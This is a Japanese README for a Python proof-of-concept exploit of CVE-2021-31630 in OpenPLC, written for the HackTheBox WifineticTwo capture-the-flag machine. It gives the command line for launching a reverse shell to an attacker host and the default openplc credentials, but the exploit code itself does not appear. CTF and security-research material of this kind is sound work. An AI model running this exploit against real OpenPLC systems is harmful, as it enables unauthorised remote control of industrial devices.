
HTB WifineticTwo CTF における CVE-2021-31630 を悪用する簡単な Python スクリプト
このPythonスクリプトは、CVE-2021-31630のProof of Concept (PoC)エクスプロイトです。HackTheBoxのWifineticTwoボックスで動作するOpenPLCの脆弱性を標的としています。教育目的のみで設計されており、管理された環境でのエクスプロイトプロセスを実証することを目的としています。
このツールはセキュリティ研究および教育目的のみを意図しています。このツールを事前の相互同意なくターゲットを攻撃するために使用することは違法です。開発者は、このエクスプロイトを悪用したユーザーに対する損害や刑事告訴について一切の責任を負いません。
このエクスプロイトを実行する前に、以下を確認してください:
requestsライブラリがインストールされていること。pip install requestsでインストールできます。このエクスプロイトを使用するには、ターゲットのURL、リバースシェルが接続するローカルホストIP(LHOST)、およびローカルポート(LPORT)を指定する必要があります。オプションで、デフォルトと異なる場合、OpenPLCのユーザー名とパスワードを指定できます。
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
--target - ターゲットのベースアドレス。例:http://wifinetictwo.htb:8080--lhost - リバースシェルが接続するローカルホストIPアドレス。--lport - リバースシェルが接続するローカルポート。--usr - (オプション) OpenPLCのユーザー名。デフォルトはopenplc。--pwd - (オプション) OpenPLCのパスワード。デフォルトはopenplc。